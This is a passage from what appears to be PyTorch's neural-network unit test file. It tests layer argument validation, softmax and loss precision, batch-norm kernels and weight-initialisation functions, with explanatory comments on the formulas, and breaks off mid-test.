fold(torch.randn(1, 6, 5)) # should be 4 * 1 = 4 sliding blocks
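# The sliding-block count Fold/Unfold validate against follows, per spatial
# dim, the documented formula (a worked check of the case above):
# n_d = floor((out_d + 2 * pad_d - dil_d * (k_d - 1) - 1) / stride_d) + 1
# height: floor((4 + 4 - 1 - 1) / 2) + 1 = 4; width: floor((5 + 0 - 4 - 1) / 2) + 1 = 1
# i.e. the 4 * 1 = 4 sliding blocks noted above.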
def test_unfold_invalid_arg(self):
# input wrong dimension
unfold = nn.Unfold(kernel_size=(2, 3))
with self.assertRaisesRegex(NotImplementedError, r"Only 4D input Tensors are supported"):
unfold(torch.randn(1, 5, 2))
# calculated output shape is too small
with self.assertRaisesRegex(RuntimeError, r"too small \(non-positive\)"):
unfold = nn.Unfold(kernel_size=(2, 3))
unfold(torch.randn(1, 2, 2, 2))
with self.assertRaisesRegex(RuntimeError, r"too small \(non-positive\)"):
unfold = nn.Unfold(kernel_size=(5, 3), padding=(1, 1))
unfold(torch.randn(1, 2, 2, 3))
with self.assertRaisesRegex(RuntimeError, r"too small \(non-positive\)"):
unfold = nn.Unfold(kernel_size=(1, 3), padding=(1, 1), dilation=(1, 2))
unfold(torch.randn(1, 2, 2, 2))
def test_conv_padding_mode(self):
with self.assertRaisesRegex(ValueError, "padding_mode must be one of"):
nn.Conv2d(3, 3, 3, padding_mode="xyz")
with self.assertRaisesRegex(ValueError, "padding_mode must be one of"):
nn.Conv2d(3, 3, 3, padding_mode=3)
with self.assertRaisesRegex(ValueError, "Only \"zeros\" "):
nn.ConvTranspose2d(3, 3, 3, padding_mode="reflect")
def test_softmin(self):
x = torch.randn(2, 16)
self.assertEqual(F.softmin(x, 1), F.softmax(-x, 1))
self.assertEqual(F.softmin(x, 0), F.softmax(-x, 0))
def test_log_softmax_cpu(self, dtype=torch.bfloat16):
inputf = torch.rand(32, 100, device="cpu", dtype=torch.float, requires_grad=True)
input = inputf.to(dtype).detach().requires_grad_(True)
outf = F.log_softmax(inputf, dim=-1)
out = F.log_softmax(input, dim=-1)
self.assertEqual(out.dtype, dtype)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(out, outf, atol=0.1, rtol=0)
out.sum().backward()
outf.sum().backward()
self.assertEqual(input.grad.dtype, dtype)
self.assertEqual(input.grad, inputf.grad.to(dtype), atol=0.1, rtol=0)
def test_softmax_cpu(self, dtype=torch.bfloat16):
inputf = torch.rand(32, 100, device="cpu", dtype=torch.float, requires_grad=True)
input = inputf.to(dtype).detach().requires_grad_(True)
outf = F.softmax(inputf, dim=-1)
out = F.softmax(input, dim=-1)
self.assertEqual(out.dtype, dtype)
self.assertEqualIgnoreType(out, outf, atol=1e-3, rtol=0)
out.sum().backward()
outf.sum().backward()
self.assertEqual(input.grad.dtype, dtype)
self.assertEqual(input.grad, inputf.grad.to(dtype), atol=1e-3, rtol=0)
def test_adaptive_log_softmax(self):
# args validation
with self.assertRaises(ValueError):
_ = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 15, 15], div_value=2.)
with self.assertRaises(ValueError):
_ = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 15, 10], div_value=2.)
with self.assertRaises(ValueError):
_ = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 10, 25], div_value=2.)
with self.assertRaisesRegex(ValueError, "cutoffs should be a sequence of unique,"):
_ = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 10, 20], div_value=2.)
# should not raise
_ = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 10, 19], div_value=2.)
# input shapes
with self.assertRaisesRegex(RuntimeError, r"Input and target should have the same size"):
asfm = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 10, 15], div_value=2.)
x = torch.randn(2, 16)
y = torch.tensor([0, 5, 10])
asfm(x, y)
# out-of-bound targets
with self.assertRaisesRegex(RuntimeError, r"Target values should be in"):
asfm = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 10, 15], div_value=2.)
x = torch.randn(2, 16)
y = torch.tensor([0, 20])
asfm(x, y)
# cluster sizes
asfm = nn.AdaptiveLogSoftmaxWithLoss(16, 20, [5, 10, 15], div_value=2.)
x = torch.randn(2, 16)
y = torch.tensor([0, 17])
self.assertEqual(asfm.head.weight.size(), (5 + 3, 16)) # 5 targets in head, 3 clusters, dimensionality 16
self.assertEqual(asfm.tail[0][1].weight.size(), (5, 8)) # 5 targets in this cluster, dimensionality 8
self.assertEqual(asfm.tail[1][1].weight.size(), (5, 4))
self.assertEqual(asfm.tail[2][1].weight.size(), (5, 2))
self.assertEqual(asfm(x, y).output.size(), (2, ))
# log_prob actually returns log-probabilities
asfm = nn.AdaptiveLogSoftmaxWithLoss(8, 4, [2], div_value=2.)
x = torch.randn(4, 8)
logprob_out = asfm.log_prob(x)
self.assertEqual(torch.exp(logprob_out).data.sum(1), torch.ones(4))
# forward returns the same thing as log_prob
for v in [0, 1, 2, 3]:
y = torch.full((4,), v, dtype=torch.long)
out, loss = asfm(x, y)
self.assertEqual(out, logprob_out.gather(1, y.unsqueeze(1)).squeeze())
self.assertEqual(loss, F.nll_loss(logprob_out, y))
# predict
x = torch.randn(64, 8).abs_()
# argmax in shortlist
asfm = nn.AdaptiveLogSoftmaxWithLoss(8, 10, [4, 8], div_value=2., head_bias=True)
asfm.head.weight.data.abs_()
asfm.head.bias.data.abs_()
asfm.head.weight.data[asfm.shortlist_size:, :].zero_()
out = asfm.predict(x)
self.assertEqual(out, asfm.log_prob(x).argmax(dim=1))
# argmax outside of shortlist
asfm = nn.AdaptiveLogSoftmaxWithLoss(8, 10, [4, 8], div_value=2., head_bias=True)
asfm.head.weight.data.abs_()
asfm.head.bias.data.abs_()
asfm.head.weight.data[:asfm.shortlist_size, :].zero_()
out = asfm.predict(x)
self.assertEqual(out, asfm.log_prob(x).argmax(dim=1))
# half of the argmax in shortlist, half in clusters
asfm = nn.AdaptiveLogSoftmaxWithLoss(8, 10, [4, 8], div_value=2., head_bias=True)
asfm.head.weight.data.abs_()
asfm.head.bias.data.abs_()
x[:32, :asfm.shortlist_size].zero_()
x[32:, asfm.shortlist_size:].zero_()
asfm.head.weight.data[:asfm.shortlist_size, asfm.shortlist_size:].zero_()
asfm.head.weight.data[asfm.shortlist_size:, :asfm.shortlist_size].zero_()
out = asfm.predict(x)
self.assertEqual(out, asfm.log_prob(x).argmax(dim=1))
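# The cluster dimensionalities asserted above follow from div_value=2.:
# each successive tail cluster halves in_features, so for in_features=16 the
# tails project through 16 / 2 = 8, 16 / 4 = 4 and 16 / 8 = 2 features, and
# the head covers the shortlist (5 targets) plus one slot per cluster (3).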
def test_cross_entropy_loss(self, dtype=torch.bfloat16):
loss_cpu = nn.CrossEntropyLoss().cpu()
inputf = torch.randn(15, 10, device="cpu", dtype=torch.float, requires_grad=True)
input = inputf.to(dtype).detach().requires_grad_(True)
target = torch.empty(15, dtype=torch.long).random_(10)
outf = loss_cpu(inputf, target)
out = loss_cpu(input, target)
self.assertEqual(out.dtype, dtype)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(out, outf, atol=1e-1, rtol=0)
outf.backward()
out.backward()
self.assertEqual(input.grad.dtype, dtype)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(input.grad, inputf.grad, atol=1e-1, rtol=0)
def test_cross_entropy_loss_precision(self):
# Regression test for #55657
loss_cpu = nn.CrossEntropyLoss().cpu()
inputf = torch.randn(128, 2, 768, 768, device="cpu", dtype=torch.float)
inputd = inputf.double()
target = torch.randint(2, (128, 768, 768), dtype=torch.long)
outf = loss_cpu(inputf, target)
outd = loss_cpu(inputd, target)
self.assertEqual(outf, outd, exact_dtype=False)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_convert_sync_batchnorm(self):
module = torch.nn.Sequential(
torch.nn.BatchNorm1d(100),
torch.nn.InstanceNorm1d(100)
).cuda()
# keep an unconverted copy as an anchor point for comparison, in case
# convert_sync_batchnorm updates the module in place
comp_module = torch.nn.Sequential(
torch.nn.BatchNorm1d(100),
torch.nn.InstanceNorm1d(100)
).cuda()
comp_module.load_state_dict(module.state_dict())
sync_bn_module = torch.nn.SyncBatchNorm.convert_sync_batchnorm(module)
children = list(sync_bn_module.children())
self.assertEqual(children[0].__class__, torch.nn.SyncBatchNorm)
self.assertEqual(children[1].__class__, torch.nn.InstanceNorm1d)
for layer, converted_layer in zip(comp_module.children(), sync_bn_module.children()):
for key in layer.state_dict().keys():
self.assertEqual(layer.state_dict()[key].device, converted_layer.state_dict()[key].device)
self.assertEqual(layer.state_dict()[key], converted_layer.state_dict()[key])
@unittest.skipIf(not TEST_CUDA, "CUDA not available")
def test_sync_batchnorm_backward_elemt(self):
device = 'cuda'
saved_input = torch.rand(2, 3, 2, 1, device=device)
grad_output = torch.rand(2, 3, 2, 1, device=device)
mean = torch.rand(3, device=device)
invstd = torch.rand(3, device=device)
weight = torch.rand(3, device=device)
sum_dy = torch.rand(3, device=device)
sum_dy_xmu = torch.rand(3, device=device)
count_tensor = torch.tensor([5, 5, 5], dtype=torch.int32, device=device)
gI_contiguous = torch.batch_norm_backward_elemt(
grad_output,
saved_input,
mean,
invstd,
weight,
sum_dy,
sum_dy_xmu,
count_tensor
)
# Test that batch_norm_backward_elemt gives the same answer for all
# combinations of contiguous and channels_last inputs
for a, b in [
(torch.channels_last, torch.contiguous_format),
(torch.contiguous_format, torch.channels_last),
(torch.channels_last, torch.channels_last),
]:
gI_actual = torch.batch_norm_backward_elemt(
grad_output.contiguous(memory_format=a),
saved_input.contiguous(memory_format=b),
mean,
invstd,
weight,
sum_dy,
sum_dy_xmu,
count_tensor
)
self.assertEqual(gI_actual, gI_contiguous)
@unittest.skipIf(not TEST_CUDA, "CUDA not available")
def test_sync_batchnorm_accuracy_cuda(self):
# This test checks the functionality and accuracy of the single-GPU CUDA
# kernels used in SyncBatchNorm
# They are:
# fwd: torch.batch_norm_stats, torch.batch_norm_gather_stats_with_counts, torch.batch_norm_elemt
# bwd: torch.batch_norm_backward_reduce, torch.batch_norm_backward_elemt
def _batch_norm_stats(data):
mean1, _ = torch.batch_norm_stats(data, 1e-5)
mean2, _ = torch.batch_norm_stats(data.to(memory_format=torch.channels_last), 1e-5)
mean_ref = torch.mean(data, (0, 2, 3), keepdim=False)
self.assertEqual(mean_ref, mean1)
self.assertEqual(mean_ref, mean2)
data = torch.randn(1, 96, 112, 112, dtype=torch.float, device='cuda')
_batch_norm_stats(data)
def test_functional_grad_conv(self):
# Conv 1D
input = torch.randn(1, 1, 5, requires_grad=True)
weight = torch.randn(1, 1, 3, requires_grad=True)
output = F.conv1d(input, weight, dilation=2)
grad_output = torch.randn(output.shape)
grad_input_autograd = torch.autograd.grad(output, input, grad_output)[0]
grad_input_functional = torch.nn.grad.conv1d_input(input.shape, weight, grad_output, dilation=2)
self.assertEqual(grad_input_functional, grad_input_autograd)
# Conv 2D
input = torch.randn(1, 1, 5, 5, requires_grad=True)
weight = torch.randn(1, 1, 3, 3, requires_grad=True)
output = F.conv2d(input, weight, dilation=2)
grad_output = torch.randn(output.shape)
grad_input_autograd = torch.autograd.grad(output, input, grad_output)[0]
grad_input_functional = torch.nn.grad.conv2d_input(input.shape, weight, grad_output, dilation=2)
self.assertEqual(grad_input_functional, grad_input_autograd)
# Conv 3D
input = torch.randn(1, 1, 5, 5, 5, requires_grad=True)
weight = torch.randn(1, 1, 3, 3, 3, requires_grad=True)
output = F.conv3d(input, weight, dilation=2)
grad_output = torch.randn(output.shape)
grad_input_autograd = torch.autograd.grad(output, input, grad_output)[0]
grad_input_functional = torch.nn.grad.conv3d_input(input.shape, weight, grad_output, dilation=2)
self.assertEqual(grad_input_functional, grad_input_autograd)
# Warning for _grad_input_padding
with warnings.catch_warnings(record=True) as w:
torch.nn.grad._grad_input_padding(torch.rand(1, 2, 3), [1, 2, 5], (1,), (0,), (3,))
self.assertEqual(len(w), 1)
def test_flatten(self):
tensor_input = torch.randn(2, 1, 2, 3)
# Flatten Tensor
flatten = nn.Flatten(start_dim=1, end_dim=-1)
tensor_output = flatten(tensor_input)
self.assertEqual(tensor_output.size(), torch.Size([2, 6]))
def test_unflatten(self):
tensor_input = torch.randn(2, 50)
# Unflatten Tensor (unflattened_size as a tuple of ints or a list of ints)
for us in ((2, 5, 5), [2, 5, 5]):
unflatten = nn.Unflatten(dim=1, unflattened_size=us)
tensor_output = unflatten(tensor_input)
self.assertEqual(tensor_output.size(), torch.Size([2, 2, 5, 5]))
# Unflatten NamedTensor
unflatten = nn.Unflatten(dim='features', unflattened_size=(('C', 2), ('H', 5), ('W', 5)))
named_tensor_input = tensor_input.refine_names('N', 'features')
named_tensor_output = unflatten(named_tensor_input)
self.assertEqual(named_tensor_output.size(), torch.Size([2, 2, 5, 5]))
def test_unflatten_invalid_arg(self):
# Wrong type for unflattened_size (tuple of floats)
with self.assertRaisesRegex(
TypeError,
r"unflattened_size must be tuple of ints, but found element of type float at pos 2"):
nn.Unflatten(dim=1, unflattened_size=(2, 5, 5.0))
# Wrong type for unflattened_size (list of lists and list of tuples)
for us in ([['C', 2], ['W', 5], ['H', 5]], [('C', 2), ('W', 5), ('H', 5)]):
with self.assertRaisesRegex(
TypeError,
r"unflattened_size must be a tuple of tuples, but found type list"):
nn.Unflatten(dim='features', unflattened_size=us)
# Wrong type for unflattened_size (tuple of lists)
with self.assertRaisesRegex(
TypeError,
r"unflattened_size must be tuple of tuples, but found element of type list at pos 0"):
nn.Unflatten(dim='features', unflattened_size=(['C', 2], ['W', 5], ['H', 5]))
# Wrong type for unflattened_size (tuple of dicts)
with self.assertRaisesRegex(
TypeError,
r"unflattened_size must be tuple of tuples, but found element of type dict at pos 0"):
nn.Unflatten(dim='features', unflattened_size=({'C': 2}, {'W': 5}, {'H': 5}))
def test_layer_norm_grads_with_create_graph_flag(self):
atol = 1e-5
rtol = 1e-3
x = torch.randn((4, 4, 16), requires_grad=True)
layer_norm = nn.LayerNorm((16,), 1e-5, True)
with torch.no_grad():
layer_norm.weight = torch.nn.Parameter(0.1 * torch.ones_like(layer_norm.weight))
grads1 = torch.autograd.grad(layer_norm(x).sum(), x, create_graph=False)[0]
grads2 = torch.autograd.grad(layer_norm(x).sum(), x, create_graph=True)[0]
self.assertEqual(grads1, grads2, rtol=rtol, atol=atol)
if TEST_CUDA:
x = x.to('cuda')
layer_norm = layer_norm.to('cuda')
grads1 = torch.autograd.grad(layer_norm(x).sum(), x, create_graph=False)[0]
grads2 = torch.autograd.grad(layer_norm(x).sum(), x, create_graph=True)[0]
self.assertEqual(grads1, grads2, rtol=rtol, atol=atol)
def test_padding_list(self):
# Padding can be a list, or tuple (regression test for gh-54452)
x = torch.randn(4, 8, 32, 32)
net = torch.nn.ConvTranspose2d(8, 16, kernel_size=3, padding=[3, 3])
y = net(x)
net = torch.nn.ConvTranspose2d(8, 16, kernel_size=3, padding=(3, 3))
y = net(x)
class TestNNInit(TestCase):
def setUp(self):
super(TestNNInit, self).setUp()
random.seed(123)
def _is_normal(self, tensor, mean, std):
samples = tensor.view(-1).tolist()
p_value = stats.kstest(samples, 'norm', args=(mean, std))[1]
return p_value > 0.0001
def _is_trunc_normal(self, tensor, mean, std, a, b):
# scipy's trunc norm is suited for data drawn from N(0, 1),
# so we need to transform our data to test it using scipy.
z_samples = (tensor.view(-1) - mean) / std
z_samples = z_samples.tolist()
a0 = (a - mean) / std
b0 = (b - mean) / std
p_value = stats.kstest(z_samples, 'truncnorm', args=(a0, b0))[1]
return p_value > 0.0001
def _is_uniform(self, tensor, a, b):
samples = tensor.view(-1).tolist()
p_value = stats.kstest(samples, 'uniform', args=(a, (b - a)))[1]
return p_value > 0.0001
def _create_random_nd_tensor(self, dims, size_min, size_max):
size = [random.randint(size_min, size_max) for _ in range(dims)]
tensor = torch.zeros(size)
return tensor
def _random_float(self, a, b):
return (b - a) * random.random() + a
def test_calculate_gain_linear(self):
for fn in ['linear', 'conv1d', 'conv2d', 'conv3d', 'conv_transpose1d', 'conv_transpose2d', 'conv_transpose3d']:
gain = init.calculate_gain(fn)
self.assertEqual(gain, 1)
def test_calculate_gain_nonlinear(self):
for fn in ['sigmoid', 'tanh', 'relu', 'leaky_relu']:
gain = init.calculate_gain(fn)
if fn == 'sigmoid':
self.assertEqual(gain, 1)
elif fn == 'tanh': # 5 / 3
self.assertEqual(gain, 1.6666666666666667)
elif fn == 'relu': # sqrt(2)
self.assertEqual(gain, 1.4142135623730951)
elif fn == 'leaky_relu': # sqrt(2 / (1 + slope^2))
self.assertEqual(gain, 1.4141428569978354)
elif fn == 'selu':
self.assertEqual(gain, 0.75)
def test_calculate_gain_leaky_relu(self):
for param in [None, 0, 0.01, 10]:
gain = init.calculate_gain('leaky_relu', param)
if param is None: # Default slope is 0.01
self.assertEqual(gain, 1.4141428569978354)
elif param == 0: # No slope = same gain as normal ReLU
self.assertEqual(gain, 1.4142135623730951)
elif param == 0.01:
self.assertEqual(gain, 1.4141428569978354)
elif param == 10:
self.assertEqual(gain, 0.14071950894605836)
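# The leaky_relu gains above are instances of gain = sqrt(2 / (1 + a^2)):
# a = 0 -> sqrt(2) ~= 1.4142135623730951
# a = 0.01 -> sqrt(2 / 1.0001) ~= 1.4141428569978354
# a = 10 -> sqrt(2 / 101) ~= 0.14071950894605836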
def test_calculate_gain_leaky_relu_only_accepts_numbers(self):
for param in [True, [1], {'a': 'b'}]:
with self.assertRaises(ValueError):
init.calculate_gain('leaky_relu', param)
def test_calculate_gain_only_accepts_valid_nonlinearities(self):
for n in [2, 5, 25]:
# Generate random lowercase strings that are not valid nonlinearity names
random_string = ''.join([random.choice(string.ascii_lowercase) for i in range(n)])
with self.assertRaises(ValueError):
init.calculate_gain(random_string)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_uniform(self):
for dims in [1, 2, 4]:
input_tensor = self._create_random_nd_tensor(dims, size_min=30, size_max=50)
a = self._random_float(-3, 3)
b = a + self._random_float(1, 5)
init.uniform_(input_tensor, a=a, b=b)
assert self._is_uniform(input_tensor, a, b)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_normal(self):
for dims in [1, 2, 4]:
input_tensor = self._create_random_nd_tensor(dims, size_min=30, size_max=50)
mean = self._random_float(-3, 3)
std = self._random_float(1, 5)
init.normal_(input_tensor, mean=mean, std=std)
assert self._is_normal(input_tensor, mean, std)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_trunc_normal(self):
for dims in [1, 2, 4]:
input_tensor = self._create_random_nd_tensor(dims, size_min=30, size_max=50)
mean = self._random_float(-3, 3)
std = self._random_float(.01, 1)
a = self._random_float(mean - 2 * std, mean)
b = self._random_float(mean, mean + 2 * std)
init.trunc_normal_(input_tensor, mean=mean, std=std, a=a, b=b)
assert self._is_trunc_normal(input_tensor, mean, std, a, b)
def test_constant(self):
for dims in [1, 2, 4]:
input_tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=5)
val = self._random_float(1, 10)
init.constant_(input_tensor, val)
self.assertEqual(input_tensor, input_tensor.clone().fill_(val))
def test_ones_and_zeros(self):
for init_fn_, val in zip([init.ones_, init.zeros_], [1, 0]):
for dims in [1, 2, 4]:
input_tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=5)
init_fn_(input_tensor)
self.assertEqual(input_tensor, input_tensor.clone().fill_(val))
def test_eye(self):
input_tensor = self._create_random_nd_tensor(2, size_min=1, size_max=5)
init.eye_(input_tensor)
# Check every single element
for i in range(input_tensor.size(0)):
for j in range(input_tensor.size(1)):
if i == j:
assert input_tensor[i][j] == 1
else:
assert input_tensor[i][j] == 0
def test_eye_only_works_on_2d_inputs(self):
for dims in [1, 3]:
with self.assertRaises(ValueError):
tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=3)
init.eye_(tensor)
def test_max_unpool(self):
# Test 1D
output, indices = F.max_pool1d(torch.randn([1, 1, 4]), 2, stride=2, return_indices=True)
self.assertEqual(F.max_unpool1d(output, indices, 2), F.max_unpool1d(output, indices, 2, stride=2))
# Test list / tuple passed as argument to max_unpool1d
input = torch.randn([1, 1, 5])
output, indices = F.max_pool1d(input, 2, stride=2, return_indices=True)
self.assertEqual(F.max_unpool1d(output, indices, 2, stride=2, output_size=input.shape),
F.max_unpool1d(output, indices, 2, stride=2, output_size=input.size()))
# Test 2D
output, indices = F.max_pool2d(torch.randn([1, 1, 4, 4]), 2, stride=2, return_indices=True)
self.assertEqual(F.max_unpool2d(output, indices, 2), F.max_unpool2d(output, indices, 2, stride=2))
# Test 3D
output, indices = F.max_pool3d(torch.randn([4, 4, 4, 4, 4]), 2, stride=2, return_indices=True)
self.assertEqual(F.max_unpool3d(output, indices, 2), F.max_unpool3d(output, indices, 2, stride=2))
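# A hedged sketch of the pool/unpool round trip checked above: unpooling
# places each pooled maximum back at the index it came from and zeroes the rest.
# x = torch.tensor([[[1., 3., 2., 4.]]])
# out, idx = F.max_pool1d(x, 2, stride=2, return_indices=True) # [[[3., 4.]]]
# F.max_unpool1d(out, idx, 2) # [[[0., 3., 0., 4.]]]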
def test_dirac_properties(self):
for dims in [3, 4, 5]:
for groups in [1, 2, 3]:
# prepare a tensor with random sizes whose first dim is a multiple of groups
a, c, d, e = (random.randint(1, 5) for _ in range(4))
b = random.randint(1, 5 * groups) # second dim may take any value in the same range as a * groups
# make the first dim divisible by groups
input_tensor = torch.randn((a * groups, b, c, d, e)[:dims])
init.dirac_(input_tensor, groups)
c_out, c_in = input_tensor.size(0) // groups, input_tensor.size(1)
min_d = min(c_out, c_in)
# Check number of nonzeros is equivalent to smallest dim (for each group)
assert torch.nonzero(input_tensor).size(0) == min_d * groups
# Check sum of values (can have precision issues, hence assertEqual) is also equivalent
self.assertEqual(input_tensor.sum(), min_d * groups)
def test_dirac_identity(self):
for groups in [1, 3]:
batch, in_c, out_c, size, kernel_size = 8, 3, 9, 5, 3 # in_c and out_c must be divisible by groups
eff_out_c = out_c // groups
# Test 1D
input_var = torch.randn(batch, in_c, size)
filter_var = torch.zeros(eff_out_c, in_c, kernel_size)
filter_var = torch.cat([filter_var] * groups)
init.dirac_(filter_var, groups)
output_var = F.conv1d(input_var, filter_var)
input_tensor, output_tensor = input_var.data, output_var.data # Variables do not support nonzero
for g in range(groups):
# Assert in_c outputs are preserved (for each group)
self.assertEqual(input_tensor[:, :, 1:-1],
output_tensor[:, eff_out_c * g:eff_out_c * g + in_c, :])
# Assert extra outputs are 0
assert torch.nonzero(output_tensor[:, eff_out_c * g + in_c:eff_out_c * (g + 1), :]).numel() == 0
# Test 2D
input_var = torch.randn(batch, in_c, size, size)
filter_var = torch.zeros(eff_out_c, in_c, kernel_size, kernel_size)
filter_var = torch.cat([filter_var] * groups)
init.dirac_(filter_var, groups)
output_var = F.conv2d(input_var, filter_var)
input_tensor, output_tensor = input_var.data, output_var.data # Variables do not support nonzero
for g in range(groups):
# Assert in_c outputs are preserved (for each group)
self.assertEqual(input_tensor[:, :, 1:-1, 1:-1],
output_tensor[:, eff_out_c * g:eff_out_c * g + in_c, :, :])
# Assert extra outputs are 0
assert torch.nonzero(output_tensor[:, eff_out_c * g + in_c:eff_out_c * (g + 1), :, :]).numel() == 0
# Test 3D
input_var = torch.randn(batch, in_c, size, size, size)
filter_var = torch.zeros(eff_out_c, in_c, kernel_size, kernel_size, kernel_size)
filter_var = torch.cat([filter_var] * groups)
init.dirac_(filter_var, groups)
output_var = F.conv3d(input_var, filter_var)
input_tensor, output_tensor = input_var.data, output_var.data
for g in range(groups):
# Assert in_c outputs are preserved (for each group)
self.assertEqual(input_tensor[:, :, 1:-1, 1:-1, 1:-1],
output_tensor[:, eff_out_c * g:eff_out_c * g + in_c, :, :, :])
# Assert extra outputs are 0
assert torch.nonzero(output_tensor[:, eff_out_c * g + in_c:eff_out_c * (g + 1), :, :, :]).numel() == 0
def test_dirac_only_works_on_3_4_5d_inputs(self):
for dims in [1, 2, 6]:
with self.assertRaises(ValueError):
tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=3)
init.dirac_(tensor)
def test_xavier_uniform_errors_on_inputs_smaller_than_2d(self):
for dims in [0, 1]:
tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=1)
with self.assertRaises(ValueError):
init.xavier_uniform_(tensor)
def test_xavier_normal_errors_on_inputs_smaller_than_2d(self):
for dims in [0, 1]:
tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=1)
with self.assertRaises(ValueError):
init.xavier_normal_(tensor)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_xavier_uniform(self):
for use_gain in [True, False]:
for dims in [2, 4]:
input_tensor = self._create_random_nd_tensor(dims, size_min=20, size_max=25)
gain = 1
if use_gain:
gain = self._random_float(0.1, 2)
init.xavier_uniform_(input_tensor, gain=gain)
else:
init.xavier_uniform_(input_tensor)
fan_in = input_tensor.size(1)
fan_out = input_tensor.size(0)
if input_tensor.dim() > 2:
fan_in *= input_tensor[0, 0].numel()
fan_out *= input_tensor[0, 0].numel()
expected_std = gain * math.sqrt(2.0 / (fan_in + fan_out))
bounds = expected_std * math.sqrt(3)
assert self._is_uniform(input_tensor, -bounds, bounds)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_xavier_normal(self):
for use_gain in [True, False]:
for dims in [2, 4]:
input_tensor = self._create_random_nd_tensor(dims, size_min=20, size_max=25)
gain = 1
if use_gain:
gain = self._random_float(0.1, 2)
init.xavier_normal_(input_tensor, gain=gain)
else:
init.xavier_normal_(input_tensor)
fan_in = input_tensor.size(1)
fan_out = input_tensor.size(0)
if input_tensor.dim() > 2:
fan_in *= input_tensor[0, 0].numel()
fan_out *= input_tensor[0, 0].numel()
expected_std = gain * math.sqrt(2.0 / (fan_in + fan_out))
assert self._is_normal(input_tensor, 0, expected_std)
def test_kaiming_uniform_errors_on_inputs_smaller_than_2d(self):
for dims in [0, 1]:
with self.assertRaises(ValueError):
tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=1)
init.kaiming_uniform_(tensor)
def test_kaiming_normal_errors_on_inputs_smaller_than_2d(self):
for dims in [0, 1]:
with self.assertRaises(ValueError):
tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=1)
init.kaiming_normal_(tensor)
def test_kaiming_uniform_warning_on_0element_tensor(self):
tensor = torch.empty(0, 1)
with self.assertWarnsRegex(UserWarning, "Initializing zero-element tensors is a no-op"):
_ = init.kaiming_uniform_(tensor)
def test_kaiming_normal_warning_on_0element_tensor(self):
tensor = torch.empty(0, 1)
with self.assertWarnsRegex(UserWarning, "Initializing zero-element tensors is a no-op"):
_ = init.kaiming_normal_(tensor)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_kaiming_uniform(self):
for use_a in [True, False]:
for dims in [2, 4]:
for mode in ['fan_in', 'fan_out']:
input_tensor = self._create_random_nd_tensor(dims, size_min=20, size_max=25)
if use_a:
a = self._random_float(0.1, 2)
init.kaiming_uniform_(input_tensor, a=a, mode=mode)
else:
a = 0
init.kaiming_uniform_(input_tensor, mode=mode)
fan_in = input_tensor.size(1)
fan_out = input_tensor.size(0)
if input_tensor.dim() > 2:
fan_in *= input_tensor[0, 0].numel()
fan_out *= input_tensor[0, 0].numel()
if mode == 'fan_in':
n = fan_in
else:
n = fan_out
expected_std = math.sqrt(2.0 / ((1 + a**2) * n))
bounds = expected_std * math.sqrt(3.0)
assert self._is_uniform(input_tensor, -bounds, bounds)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_kaiming_normal(self):
for use_a in [True, False]:
for dims in [2, 4]:
for mode in ['fan_in', 'fan_out']:
input_tensor = self._create_random_nd_tensor(dims, size_min=20, size_max=25)
if use_a:
a = self._random_float(0.1, 2)
init.kaiming_normal_(input_tensor, a=a, mode=mode)
else:
a = 0
init.kaiming_normal_(input_tensor, mode=mode)
fan_in = input_tensor.size(1)
fan_out = input_tensor.size(0)
if input_tensor.dim() > 2:
fan_in *= input_tensor[0, 0].numel()
fan_out *= input_tensor[0, 0].numel()
if mode == 'fan_in':
n = fan_in
else:
n = fan_out
expected_std = math.sqrt(2.0 / ((1 + a**2) * n))
assert self._is_normal(input_tensor, 0, expected_std)
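    # A minimal sketch of the Kaiming std asserted above (illustrative helper,
    # not called by the tests): the leaky_relu gain is sqrt(2 / (1 + a**2)),
    # divided by sqrt(fan), where fan is fan_in or fan_out depending on mode.
    @staticmethod
    def _kaiming_std_sketch(fan, a=0.0):
        return math.sqrt(2.0 / ((1 + a ** 2) * fan))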
def test_sparse_only_works_on_2d_inputs(self):
for dims in [1, 3]:
with self.assertRaises(ValueError):
sparsity = self._random_float(0.1, 0.9)
tensor = self._create_random_nd_tensor(dims, size_min=1, size_max=3)
init.sparse_(tensor, sparsity)
@unittest.skipIf(not TEST_SCIPY, "Scipy not found.")
def test_sparse_default_std(self):
for use_random_std in [True, False]:
input_tensor = self._create_random_nd_tensor(2, size_min=30, size_max=35)
rows, cols = input_tensor.size(0), input_tensor.size(1)
sparsity = self._random_float(0.1, 0.2)
std = 0.01 # default std
if use_random_std:
std = self._random_float(0.01, 0.2)
init.sparse_(input_tensor, sparsity=sparsity, std=std)
else:
init.sparse_(input_tensor, sparsity=sparsity)
for col_idx in range(input_tensor.size(1)):
column = input_tensor[:, col_idx]
assert column[column == 0].nelement() >= math.ceil(sparsity * rows)
assert self._is_normal(input_tensor[input_tensor != 0], 0, std)
@skipIfNoLapack
def test_orthogonal(self):
for use_gain in [True, False]:
for tensor_size in [[3, 4], [4, 3], [20, 2, 3, 4], [2, 3, 4, 5]]:
input_tensor = torch.zeros(tensor_size)
gain = 1.0
if use_gain:
